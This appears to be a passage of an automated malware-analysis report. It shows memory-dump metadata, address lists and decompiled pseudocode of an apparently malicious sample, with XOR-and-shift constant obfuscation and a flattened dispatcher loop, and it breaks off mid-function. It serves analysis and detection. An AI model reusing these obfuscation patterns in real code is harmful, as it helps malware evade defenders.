                                                                                                                                                                                                                    0x00a74778
                                                                                                                                                                                                                    0x00a7477f
                                                                                                                                                                                                                    0x00a747c4
                                                                                                                                                                                                                    0x00a747dd
                                                                                                                                                                                                                    0x00a747e4
                                                                                                                                                                                                                    0x00a747e5
                                                                                                                                                                                                                    0x00a747e6
                                                                                                                                                                                                                    0x00a747e7
                                                                                                                                                                                                                    0x00a747f5
                                                                                                                                                                                                                    0x00a747f6
                                                                                                                                                                                                                    0x00a747fd
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a74810
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7473f
                                                                                                                                                                                                                    0x00a7483a
                                                                                                                                                                                                                    0x00a7486a
                                                                                                                                                                                                                    0x00a74871
                                                                                                                                                                                                                    0x00a74876
                                                                                                                                                                                                                    0x00a74882
                                                                                                                                                                                                                    0x00a74889
                                                                                                                                                                                                                    0x00a748ce
                                                                                                                                                                                                                    0x00a748e7
                                                                                                                                                                                                                    0x00a748f7
                                                                                                                                                                                                                    0x00a74905
                                                                                                                                                                                                                    0x00a7490a
                                                                                                                                                                                                                    0x00a7490d
                                                                                                                                                                                                                    0x00a7490f
                                                                                                                                                                                                                    0x00a74915
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a74915
                                                                                                                                                                                                                    0x00a7481d
                                                                                                                                                                                                                    0x00a7481d
                                                                                                                                                                                                                    0x00a7491c
                                                                                                                                                                                                                    0x00a7491e
                                                                                                                                                                                                                    0x00a7491e
                                                                                                                                                                                                                    0x00a7491e
                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: ,@v$D/$IsW$WL&K$Zc"f$`<G$sPB$skv${-K$ot
                                                                                                                                                                                                                    • API String ID: 0-4204469050
                                                                                                                                                                                                                    • Opcode ID: dbb6062810ec5b1b16531c5a950435fb2c2e5adc3d1332a8fd12794526625f3c
                                                                                                                                                                                                                    • Instruction ID: 7537c1c1b8b38af847facce67921c3b016ff52db97d25236efcf7fd99b02c171
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dbb6062810ec5b1b16531c5a950435fb2c2e5adc3d1332a8fd12794526625f3c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD22F1715083809FD368CF25D88AA8BFBF2BBC5348F508A1DE5D986260D7B18949CF43
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                                    			E00A7EC30(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                                                                                                                    				intOrPtr _v60;
                                                                                                                                                                                                                    				char _v68;
                                                                                                                                                                                                                    				intOrPtr _v72;
                                                                                                                                                                                                                    				intOrPtr _v76;
                                                                                                                                                                                                                    				char _v80;
                                                                                                                                                                                                                    				signed int _v84;
                                                                                                                                                                                                                    				signed int _v88;
                                                                                                                                                                                                                    				signed int _v92;
                                                                                                                                                                                                                    				signed int _v96;
                                                                                                                                                                                                                    				signed int _v100;
                                                                                                                                                                                                                    				signed int _v104;
                                                                                                                                                                                                                    				signed int _v108;
                                                                                                                                                                                                                    				signed int _v112;
                                                                                                                                                                                                                    				signed int _v116;
                                                                                                                                                                                                                    				signed int _v120;
                                                                                                                                                                                                                    				signed int _v124;
                                                                                                                                                                                                                    				signed int _v128;
                                                                                                                                                                                                                    				signed int _v132;
                                                                                                                                                                                                                    				signed int _v136;
                                                                                                                                                                                                                    				signed int _v140;
                                                                                                                                                                                                                    				signed int _v144;
                                                                                                                                                                                                                    				signed int _v148;
                                                                                                                                                                                                                    				signed int _v152;
                                                                                                                                                                                                                    				signed int _v156;
                                                                                                                                                                                                                    				signed int _v160;
                                                                                                                                                                                                                    				signed int _v164;
                                                                                                                                                                                                                    				signed int _v168;
                                                                                                                                                                                                                    				signed int _v172;
                                                                                                                                                                                                                    				signed int _v176;
                                                                                                                                                                                                                    				signed int _v180;
                                                                                                                                                                                                                    				signed int _v184;
                                                                                                                                                                                                                    				signed int _v188;
                                                                                                                                                                                                                    				signed int _v192;
                                                                                                                                                                                                                    				void* __ecx;
                                                                                                                                                                                                                    				char _t282;
                                                                                                                                                                                                                    				void* _t306;
                                                                                                                                                                                                                    				signed int _t317;
                                                                                                                                                                                                                    				signed int _t318;
                                                                                                                                                                                                                    				signed int _t319;
                                                                                                                                                                                                                    				signed int _t320;
                                                                                                                                                                                                                    				signed int _t321;
                                                                                                                                                                                                                    				signed int _t322;
                                                                                                                                                                                                                    				signed int _t323;
                                                                                                                                                                                                                    				signed int _t324;
                                                                                                                                                                                                                    				signed int _t325;
                                                                                                                                                                                                                    				void* _t328;
                                                                                                                                                                                                                    				void* _t356;
                                                                                                                                                                                                                    				void* _t360;
                                                                                                                                                                                                                    				intOrPtr _t361;
                                                                                                                                                                                                                    				signed int* _t364;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t360 = __edx;
                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                    				_push(_a24);
                                                                                                                                                                                                                    				_push(_a20);
                                                                                                                                                                                                                    				_push(_a16);
                                                                                                                                                                                                                    				_push(_a12);
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				_t282 = E00A7C6D8(0);
                                                                                                                                                                                                                    				_v80 = _t282;
                                                                                                                                                                                                                    				_t364 =  &(( &_v192)[0xa]);
                                                                                                                                                                                                                    				_v72 = _t282;
                                                                                                                                                                                                                    				_t361 = _t282;
                                                                                                                                                                                                                    				_v76 = 0x847782;
                                                                                                                                                                                                                    				_v148 = 0x64245e;
                                                                                                                                                                                                                    				_t328 = 0xf3867ce;
                                                                                                                                                                                                                    				_v148 = _v148 ^ 0xe7710933;
                                                                                                                                                                                                                    				_t13 =  &_v148; // 0xe7710933
                                                                                                                                                                                                                    				_t317 = 0x5a;
                                                                                                                                                                                                                    				_v148 =  *_t13 / _t317;
                                                                                                                                                                                                                    				_v148 = _v148 ^ 0x0291494e;
                                                                                                                                                                                                                    				_v88 = 0xfe1f8b;
                                                                                                                                                                                                                    				_v88 = _v88 | 0xc36b2abe;
                                                                                                                                                                                                                    				_v88 = _v88 ^ 0xc3ff3f9f;
                                                                                                                                                                                                                    				_v124 = 0xa07558;
                                                                                                                                                                                                                    				_v124 = _v124 | 0xd879d8e3;
                                                                                                                                                                                                                    				_v124 = _v124 + 0xffffd4da;
                                                                                                                                                                                                                    				_v124 = _v124 ^ 0xd8f01939;
                                                                                                                                                                                                                    				_v156 = 0x4f6002;
                                                                                                                                                                                                                    				_v156 = _v156 ^ 0x2fa90ff1;
                                                                                                                                                                                                                    				_v156 = _v156 + 0x97ed;
                                                                                                                                                                                                                    				_v156 = _v156 + 0xe179;
                                                                                                                                                                                                                    				_v156 = _v156 ^ 0x2fedb969;
                                                                                                                                                                                                                    				_v184 = 0x4f7d69;
                                                                                                                                                                                                                    				_v184 = _v184 + 0xf391;
                                                                                                                                                                                                                    				_v184 = _v184 + 0xeb6e;
                                                                                                                                                                                                                    				_v184 = _v184 * 0x33;
                                                                                                                                                                                                                    				_v184 = _v184 ^ 0x103a99aa;
                                                                                                                                                                                                                    				_v160 = 0x7259db;
                                                                                                                                                                                                                    				_v160 = _v160 + 0xffff1734;
                                                                                                                                                                                                                    				_v160 = _v160 + 0xffffd8d4;
                                                                                                                                                                                                                    				_v160 = _v160 + 0xfffff7fb;
                                                                                                                                                                                                                    				_v160 = _v160 ^ 0x007db2f8;
                                                                                                                                                                                                                    				_v108 = 0x8c9b1;
                                                                                                                                                                                                                    				_v108 = _v108 + 0xffff2536;
                                                                                                                                                                                                                    				_v108 = _v108 ^ 0x0006632f;
                                                                                                                                                                                                                    				_v140 = 0x8bc98d;
                                                                                                                                                                                                                    				_v140 = _v140 ^ 0xb3c573f2;
                                                                                                                                                                                                                    				_v140 = _v140 << 0xa;
                                                                                                                                                                                                                    				_v140 = _v140 ^ 0x3ae4bdda;
                                                                                                                                                                                                                    				_v128 = 0x1d7904;
                                                                                                                                                                                                                    				_v128 = _v128 << 2;
                                                                                                                                                                                                                    				_v128 = _v128 << 0xf;
                                                                                                                                                                                                                    				_v128 = _v128 ^ 0xf206070e;
                                                                                                                                                                                                                    				_v176 = 0xbc28f4;
                                                                                                                                                                                                                    				_v176 = _v176 | 0xe2c36ce2;
                                                                                                                                                                                                                    				_v176 = _v176 ^ 0xafcaeb08;
                                                                                                                                                                                                                    				_v176 = _v176 << 0xe;
                                                                                                                                                                                                                    				_v176 = _v176 ^ 0x61f7ca71;
                                                                                                                                                                                                                    				_v168 = 0x37bdd7;
                                                                                                                                                                                                                    				_v168 = _v168 ^ 0xeab53c56;
                                                                                                                                                                                                                    				_v168 = _v168 * 0x78;
                                                                                                                                                                                                                    				_v168 = _v168 | 0x4cdf0658;
                                                                                                                                                                                                                    				_v168 = _v168 ^ 0xedf7b2fb;
                                                                                                                                                                                                                    				_v144 = 0xad85f4;
                                                                                                                                                                                                                    				_v144 = _v144 >> 0x10;
                                                                                                                                                                                                                    				_v144 = _v144 ^ 0x29606252;
                                                                                                                                                                                                                    				_v144 = _v144 ^ 0x2969ba04;
                                                                                                                                                                                                                    				_v152 = 0x36876a;
                                                                                                                                                                                                                    				_v152 = _v152 + 0xffff6301;
                                                                                                                                                                                                                    				_t318 = 0x2f;
                                                                                                                                                                                                                    				_v152 = _v152 / _t318;
                                                                                                                                                                                                                    				_v152 = _v152 ^ 0x000ca527;
                                                                                                                                                                                                                    				_v116 = 0x6a99e;
                                                                                                                                                                                                                    				_v116 = _v116 | 0xe56f4a3f;
                                                                                                                                                                                                                    				_v116 = _v116 ^ 0xe566ac80;
                                                                                                                                                                                                                    				_v172 = 0x948c60;
                                                                                                                                                                                                                    				_t319 = 0x63;
                                                                                                                                                                                                                    				_v172 = _v172 / _t319;
                                                                                                                                                                                                                    				_t320 = 5;
                                                                                                                                                                                                                    				_v172 = _v172 / _t320;
                                                                                                                                                                                                                    				_v172 = _v172 >> 5;
                                                                                                                                                                                                                    				_v172 = _v172 ^ 0x000373f9;
                                                                                                                                                                                                                    				_v136 = 0x6db77a;
                                                                                                                                                                                                                    				_v136 = _v136 ^ 0x77651351;
                                                                                                                                                                                                                    				_t321 = 0x3e;
                                                                                                                                                                                                                    				_v136 = _v136 / _t321;
                                                                                                                                                                                                                    				_v136 = _v136 ^ 0x01e7cceb;
                                                                                                                                                                                                                    				_v180 = 0x825716;
                                                                                                                                                                                                                    				_t322 = 0xe;
                                                                                                                                                                                                                    				_v180 = _v180 / _t322;
                                                                                                                                                                                                                    				_v180 = _v180 << 1;
                                                                                                                                                                                                                    				_v180 = _v180 << 0xa;
                                                                                                                                                                                                                    				_v180 = _v180 ^ 0x4a79bff2;
                                                                                                                                                                                                                    				_v188 = 0xaa4133;
                                                                                                                                                                                                                    				_v188 = _v188 ^ 0x9a4ec05e;
                                                                                                                                                                                                                    				_t323 = 0x18;
                                                                                                                                                                                                                    				_v188 = _v188 / _t323;
                                                                                                                                                                                                                    				_v188 = _v188 >> 0x10;
                                                                                                                                                                                                                    				_v188 = _v188 ^ 0x000cae25;
                                                                                                                                                                                                                    				_v100 = 0xa42e18;
                                                                                                                                                                                                                    				_v100 = _v100 | 0x2d3d6b21;
                                                                                                                                                                                                                    				_v100 = _v100 ^ 0x2db46e98;
                                                                                                                                                                                                                    				_v192 = 0x588c19;
                                                                                                                                                                                                                    				_t324 = 0x7d;
                                                                                                                                                                                                                    				_v192 = _v192 * 0xe;
                                                                                                                                                                                                                    				_v192 = _v192 / _t324;
                                                                                                                                                                                                                    				_t325 = 0x4e;
                                                                                                                                                                                                                    				_v192 = _v192 / _t325;
                                                                                                                                                                                                                    				_v192 = _v192 ^ 0x0000c9aa;
                                                                                                                                                                                                                    				_v84 = 0xff4cf5;
                                                                                                                                                                                                                    				_v84 = _v84 * 0x19;
                                                                                                                                                                                                                    				_v84 = _v84 ^ 0x18ecfd27;
                                                                                                                                                                                                                    				_v120 = 0x90bed3;
                                                                                                                                                                                                                    				_v120 = _v120 ^ 0x021c171b;
                                                                                                                                                                                                                    				_v120 = _v120 ^ 0x028d3aaa;
                                                                                                                                                                                                                    				_v92 = 0x1a54f6;
                                                                                                                                                                                                                    				_v92 = _v92 + 0xffff974e;
                                                                                                                                                                                                                    				_v92 = _v92 ^ 0x001c4cc6;
                                                                                                                                                                                                                    				_v112 = 0xed396b;
                                                                                                                                                                                                                    				_v112 = _v112 + 0x20d3;
                                                                                                                                                                                                                    				_v112 = _v112 ^ 0x00e71179;
                                                                                                                                                                                                                    				_v164 = 0xae7a83;
                                                                                                                                                                                                                    				_v164 = _v164 | 0xc1c62904;
                                                                                                                                                                                                                    				_v164 = _v164 + 0xb353;
                                                                                                                                                                                                                    				_v164 = _v164 << 4;
                                                                                                                                                                                                                    				_v164 = _v164 ^ 0x1ef2fc2d;
                                                                                                                                                                                                                    				_v132 = 0x668a2f;
                                                                                                                                                                                                                    				_v132 = _v132 << 0x10;
                                                                                                                                                                                                                    				_v132 = _v132 >> 7;
                                                                                                                                                                                                                    				_v132 = _v132 ^ 0x01164dfd;
                                                                                                                                                                                                                    				_v96 = 0x573762;
                                                                                                                                                                                                                    				_v96 = _v96 | 0xbab5dd9b;
                                                                                                                                                                                                                    				_v96 = _v96 ^ 0xbaf29af1;
                                                                                                                                                                                                                    				_v104 = 0x6e1b68;
                                                                                                                                                                                                                    				_v104 = _v104 << 4;
                                                                                                                                                                                                                    				_v104 = _v104 ^ 0x06e726c5;
                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                    					while(_t328 != 0x28403ad) {
                                                                                                                                                                                                                    						if(_t328 == 0xbec9c4c) {
                                                                                                                                                                                                                    							E00A6ACED(_v96, _v80, _v104);
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							if(_t328 == 0xe9b51a8) {
                                                                                                                                                                                                                    								_push(_v140);
                                                                                                                                                                                                                    								_push(_v108);
                                                                                                                                                                                                                    								_push(_v160);
                                                                                                                                                                                                                    								_push( &_v68);
                                                                                                                                                                                                                    								_t356 = 0x44;
                                                                                                                                                                                                                    								E00A73FA6(_v184, _t356);
                                                                                                                                                                                                                    								_push(_v144);
                                                                                                                                                                                                                    								_v68 = 0x44;
                                                                                                                                                                                                                    								_push(_v168);
                                                                                                                                                                                                                    								_push(_v176);
                                                                                                                                                                                                                    								_v60 = E00A81E60(0xa6174c, _v128, __eflags);
                                                                                                                                                                                                                    								_t361 = E00A6FFAD(0xa6174c, _v152, _v116, _v172, _a16, _v88 | _v148, _v136, _v180, 0xa6174c,  &_v68, _a8, _v188, 0xa6174c, _v100, 0, _t360, 0xa6174c, _v192, _v84, _v80, _v120, _v92);
                                                                                                                                                                                                                    								E00A7D6DF(_v112, _v60, _v164, _v132);
                                                                                                                                                                                                                    								_t364 =  &(_t364[0x1d]);
                                                                                                                                                                                                                    								_t328 = 0xbec9c4c;
                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								if(_t328 != 0xf3867ce) {
                                                                                                                                                                                                                    									goto L10;
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									_t328 = 0x28403ad;
                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						L13:
                                                                                                                                                                                                                    						return _t361;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					_push(_t328);
                                                                                                                                                                                                                    					_t306 = E00A77336(_v124, _a8, _v156,  &_v80);
                                                                                                                                                                                                                    					_t364 =  &(_t364[3]);
                                                                                                                                                                                                                    					__eflags = _t306;
                                                                                                                                                                                                                    					if(_t306 == 0) {
                                                                                                                                                                                                                    						_t328 = 0xacff6e7;
                                                                                                                                                                                                                    						goto L10;
                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                    						_t328 = 0xe9b51a8;
                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					goto L13;
                                                                                                                                                                                                                    					L10:
                                                                                                                                                                                                                    					__eflags = _t328 - 0xacff6e7;
                                                                                                                                                                                                                    				} while (_t328 != 0xacff6e7);
                                                                                                                                                                                                                    				goto L13;
                                                                                                                                                                                                                    			}





















































                                                                                                                                                                                                                    0x00a7ec3c
                                                                                                                                                                                                                    0x00a7ec3e
                                                                                                                                                                                                                    0x00a7ec3f
                                                                                                                                                                                                                    0x00a7ec40
                                                                                                                                                                                                                    0x00a7ec47
                                                                                                                                                                                                                    0x00a7ec4e
                                                                                                                                                                                                                    0x00a7ec55
                                                                                                                                                                                                                    0x00a7ec5c
                                                                                                                                                                                                                    0x00a7ec63
                                                                                                                                                                                                                    0x00a7ec6a
                                                                                                                                                                                                                    0x00a7ec6c
                                                                                                                                                                                                                    0x00a7ec71
                                                                                                                                                                                                                    0x00a7ec78
                                                                                                                                                                                                                    0x00a7ec7b
                                                                                                                                                                                                                    0x00a7ec82
                                                                                                                                                                                                                    0x00a7ec84
                                                                                                                                                                                                                    0x00a7ec91
                                                                                                                                                                                                                    0x00a7ec99
                                                                                                                                                                                                                    0x00a7ec9e
                                                                                                                                                                                                                    0x00a7eca6
                                                                                                                                                                                                                    0x00a7ecac
                                                                                                                                                                                                                    0x00a7ecaf
                                                                                                                                                                                                                    0x00a7ecb3
                                                                                                                                                                                                                    0x00a7ecbb
                                                                                                                                                                                                                    0x00a7ecc3
                                                                                                                                                                                                                    0x00a7eccb
                                                                                                                                                                                                                    0x00a7ecd3
                                                                                                                                                                                                                    0x00a7ecdb
                                                                                                                                                                                                                    0x00a7ece3
                                                                                                                                                                                                                    0x00a7eceb
                                                                                                                                                                                                                    0x00a7ecf3
                                                                                                                                                                                                                    0x00a7ecfb
                                                                                                                                                                                                                    0x00a7ed03
                                                                                                                                                                                                                    0x00a7ed0b
                                                                                                                                                                                                                    0x00a7ed13
                                                                                                                                                                                                                    0x00a7ed1b
                                                                                                                                                                                                                    0x00a7ed23
                                                                                                                                                                                                                    0x00a7ed2b
                                                                                                                                                                                                                    0x00a7ed38
                                                                                                                                                                                                                    0x00a7ed3c
                                                                                                                                                                                                                    0x00a7ed44
                                                                                                                                                                                                                    0x00a7ed4c
                                                                                                                                                                                                                    0x00a7ed54
                                                                                                                                                                                                                    0x00a7ed5c
                                                                                                                                                                                                                    0x00a7ed64
                                                                                                                                                                                                                    0x00a7ed6c
                                                                                                                                                                                                                    0x00a7ed74
                                                                                                                                                                                                                    0x00a7ed7c
                                                                                                                                                                                                                    0x00a7ed84
                                                                                                                                                                                                                    0x00a7ed8c
                                                                                                                                                                                                                    0x00a7ed94
                                                                                                                                                                                                                    0x00a7ed99
                                                                                                                                                                                                                    0x00a7eda1
                                                                                                                                                                                                                    0x00a7eda9
                                                                                                                                                                                                                    0x00a7edae
                                                                                                                                                                                                                    0x00a7edb3
                                                                                                                                                                                                                    0x00a7edbb
                                                                                                                                                                                                                    0x00a7edc3
                                                                                                                                                                                                                    0x00a7edcb
                                                                                                                                                                                                                    0x00a7edd3
                                                                                                                                                                                                                    0x00a7edd8
                                                                                                                                                                                                                    0x00a7ede0
                                                                                                                                                                                                                    0x00a7ede8
                                                                                                                                                                                                                    0x00a7edf5
                                                                                                                                                                                                                    0x00a7edf9
                                                                                                                                                                                                                    0x00a7ee01
                                                                                                                                                                                                                    0x00a7ee09
                                                                                                                                                                                                                    0x00a7ee11
                                                                                                                                                                                                                    0x00a7ee16
                                                                                                                                                                                                                    0x00a7ee1e
                                                                                                                                                                                                                    0x00a7ee26
                                                                                                                                                                                                                    0x00a7ee30
                                                                                                                                                                                                                    0x00a7ee3e
                                                                                                                                                                                                                    0x00a7ee43
                                                                                                                                                                                                                    0x00a7ee49
                                                                                                                                                                                                                    0x00a7ee51
                                                                                                                                                                                                                    0x00a7ee59
                                                                                                                                                                                                                    0x00a7ee61
                                                                                                                                                                                                                    0x00a7ee69
                                                                                                                                                                                                                    0x00a7ee75
                                                                                                                                                                                                                    0x00a7ee7a
                                                                                                                                                                                                                    0x00a7ee84
                                                                                                                                                                                                                    0x00a7ee89
                                                                                                                                                                                                                    0x00a7ee8f
                                                                                                                                                                                                                    0x00a7ee94
                                                                                                                                                                                                                    0x00a7ee9c
                                                                                                                                                                                                                    0x00a7eea4
                                                                                                                                                                                                                    0x00a7eeb0
                                                                                                                                                                                                                    0x00a7eeb5
                                                                                                                                                                                                                    0x00a7eebb
                                                                                                                                                                                                                    0x00a7eec3
                                                                                                                                                                                                                    0x00a7eecf
                                                                                                                                                                                                                    0x00a7eed4
                                                                                                                                                                                                                    0x00a7eeda
                                                                                                                                                                                                                    0x00a7eede
                                                                                                                                                                                                                    0x00a7eee3
                                                                                                                                                                                                                    0x00a7eeeb
                                                                                                                                                                                                                    0x00a7eef3
                                                                                                                                                                                                                    0x00a7eeff
                                                                                                                                                                                                                    0x00a7ef04
                                                                                                                                                                                                                    0x00a7ef0a
                                                                                                                                                                                                                    0x00a7ef0f
                                                                                                                                                                                                                    0x00a7ef17
                                                                                                                                                                                                                    0x00a7ef1f
                                                                                                                                                                                                                    0x00a7ef27
                                                                                                                                                                                                                    0x00a7ef2f
                                                                                                                                                                                                                    0x00a7ef3c
                                                                                                                                                                                                                    0x00a7ef3f
                                                                                                                                                                                                                    0x00a7ef4b
                                                                                                                                                                                                                    0x00a7ef53
                                                                                                                                                                                                                    0x00a7ef56
                                                                                                                                                                                                                    0x00a7ef5a
                                                                                                                                                                                                                    0x00a7ef62
                                                                                                                                                                                                                    0x00a7ef6f
                                                                                                                                                                                                                    0x00a7ef73
                                                                                                                                                                                                                    0x00a7ef7b
                                                                                                                                                                                                                    0x00a7ef83
                                                                                                                                                                                                                    0x00a7ef8b
                                                                                                                                                                                                                    0x00a7ef98
                                                                                                                                                                                                                    0x00a7efa5
                                                                                                                                                                                                                    0x00a7efad
                                                                                                                                                                                                                    0x00a7efb5
                                                                                                                                                                                                                    0x00a7efbd
                                                                                                                                                                                                                    0x00a7efc5
                                                                                                                                                                                                                    0x00a7efcd
                                                                                                                                                                                                                    0x00a7efd5
                                                                                                                                                                                                                    0x00a7efdd
                                                                                                                                                                                                                    0x00a7efe5
                                                                                                                                                                                                                    0x00a7efea
                                                                                                                                                                                                                    0x00a7eff2
                                                                                                                                                                                                                    0x00a7effa
                                                                                                                                                                                                                    0x00a7efff
                                                                                                                                                                                                                    0x00a7f004
                                                                                                                                                                                                                    0x00a7f00c
                                                                                                                                                                                                                    0x00a7f014
                                                                                                                                                                                                                    0x00a7f01c
                                                                                                                                                                                                                    0x00a7f024
                                                                                                                                                                                                                    0x00a7f02c
                                                                                                                                                                                                                    0x00a7f031
                                                                                                                                                                                                                    0x00a7f039
                                                                                                                                                                                                                    0x00a7f039
                                                                                                                                                                                                                    0x00a7f047
                                                                                                                                                                                                                    0x00a7f19c
                                                                                                                                                                                                                    0x00a7f04d
                                                                                                                                                                                                                    0x00a7f04f
                                                                                                                                                                                                                    0x00a7f061
                                                                                                                                                                                                                    0x00a7f06c
                                                                                                                                                                                                                    0x00a7f070
                                                                                                                                                                                                                    0x00a7f078
                                                                                                                                                                                                                    0x00a7f07b
                                                                                                                                                                                                                    0x00a7f07c
                                                                                                                                                                                                                    0x00a7f081
                                                                                                                                                                                                                    0x00a7f08a
                                                                                                                                                                                                                    0x00a7f095
                                                                                                                                                                                                                    0x00a7f099
                                                                                                                                                                                                                    0x00a7f0a9
                                                                                                                                                                                                                    0x00a7f126
                                                                                                                                                                                                                    0x00a7f13d
                                                                                                                                                                                                                    0x00a7f142
                                                                                                                                                                                                                    0x00a7f145
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7f051
                                                                                                                                                                                                                    0x00a7f057
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7f05d
                                                                                                                                                                                                                    0x00a7f05d
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7f05d
                                                                                                                                                                                                                    0x00a7f057
                                                                                                                                                                                                                    0x00a7f04f
                                                                                                                                                                                                                    0x00a7f1a3
                                                                                                                                                                                                                    0x00a7f1ae
                                                                                                                                                                                                                    0x00a7f1ae
                                                                                                                                                                                                                    0x00a7f15d
                                                                                                                                                                                                                    0x00a7f167
                                                                                                                                                                                                                    0x00a7f16c
                                                                                                                                                                                                                    0x00a7f16f
                                                                                                                                                                                                                    0x00a7f171
                                                                                                                                                                                                                    0x00a7f17a
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7f173
                                                                                                                                                                                                                    0x00a7f173
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7f173
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7f17f
                                                                                                                                                                                                                    0x00a7f17f
                                                                                                                                                                                                                    0x00a7f17f
                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: !k=-$3q$?Jo$D$Rb`)$b7W$i}O$k9$n$y
                                                                                                                                                                                                                    • API String ID: 0-2809877052
                                                                                                                                                                                                                    • Opcode ID: bcf27666fa9a855cb789dd6fc8513ab05a334f5dc86a73626635f703138b5c8b
                                                                                                                                                                                                                    • Instruction ID: 1661724c30f3e91fd204e4d4efb95311b017a1d2571164bb114d8c7b251c1e29
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bcf27666fa9a855cb789dd6fc8513ab05a334f5dc86a73626635f703138b5c8b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69D101715083809FD364CF21C989A1FBBF1FBC8758F508A1DF29996260D7B59A49CF42
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                                                                                                    			E00A6B8CA(intOrPtr* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                                                                                                                    				char _v32;
                                                                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                                                                    				char* _v52;
                                                                                                                                                                                                                    				intOrPtr _v76;
                                                                                                                                                                                                                    				intOrPtr _v80;
                                                                                                                                                                                                                    				intOrPtr _v84;
                                                                                                                                                                                                                    				char _v112;
                                                                                                                                                                                                                    				signed int _v116;
                                                                                                                                                                                                                    				intOrPtr _v120;
                                                                                                                                                                                                                    				intOrPtr _v124;
                                                                                                                                                                                                                    				intOrPtr _v128;
                                                                                                                                                                                                                    				char _v136;
                                                                                                                                                                                                                    				char _v140;
                                                                                                                                                                                                                    				char _v144;
                                                                                                                                                                                                                    				intOrPtr _v148;
                                                                                                                                                                                                                    				signed int _v152;
                                                                                                                                                                                                                    				signed int _v156;
                                                                                                                                                                                                                    				signed int _v160;
                                                                                                                                                                                                                    				signed int _v164;
                                                                                                                                                                                                                    				signed int _v168;
                                                                                                                                                                                                                    				signed int _v172;
                                                                                                                                                                                                                    				signed int _v176;
                                                                                                                                                                                                                    				signed int _v180;
                                                                                                                                                                                                                    				signed int _v184;
                                                                                                                                                                                                                    				signed int _v188;
                                                                                                                                                                                                                    				signed int _v192;
                                                                                                                                                                                                                    				signed int _v196;
                                                                                                                                                                                                                    				signed int _v200;
                                                                                                                                                                                                                    				signed int _v204;
                                                                                                                                                                                                                    				signed int _v208;
                                                                                                                                                                                                                    				signed int _v212;
                                                                                                                                                                                                                    				signed int _v216;
                                                                                                                                                                                                                    				signed int _v220;
                                                                                                                                                                                                                    				signed int _v224;
                                                                                                                                                                                                                    				signed int _v228;
                                                                                                                                                                                                                    				signed int _v232;
                                                                                                                                                                                                                    				signed int _v236;
                                                                                                                                                                                                                    				signed int _v240;
                                                                                                                                                                                                                    				signed int _v244;
                                                                                                                                                                                                                    				signed int _v248;
                                                                                                                                                                                                                    				signed int _v252;
                                                                                                                                                                                                                    				signed int _v256;
                                                                                                                                                                                                                    				unsigned int _v260;
                                                                                                                                                                                                                    				signed int _v264;
                                                                                                                                                                                                                    				signed int _v268;
                                                                                                                                                                                                                    				signed int _v272;
                                                                                                                                                                                                                    				signed int _v276;
                                                                                                                                                                                                                    				signed int _v280;
                                                                                                                                                                                                                    				signed int _v284;
                                                                                                                                                                                                                    				signed int _v288;
                                                                                                                                                                                                                    				signed int _v292;
                                                                                                                                                                                                                    				signed int _v296;
                                                                                                                                                                                                                    				signed int _v300;
                                                                                                                                                                                                                    				signed int _v304;
                                                                                                                                                                                                                    				signed int _v308;
                                                                                                                                                                                                                    				signed int _v312;
                                                                                                                                                                                                                    				signed int _v316;
                                                                                                                                                                                                                    				void* _t427;
                                                                                                                                                                                                                    				void* _t465;
                                                                                                                                                                                                                    				intOrPtr _t469;
                                                                                                                                                                                                                    				void* _t471;
                                                                                                                                                                                                                    				signed int _t474;
                                                                                                                                                                                                                    				void* _t488;
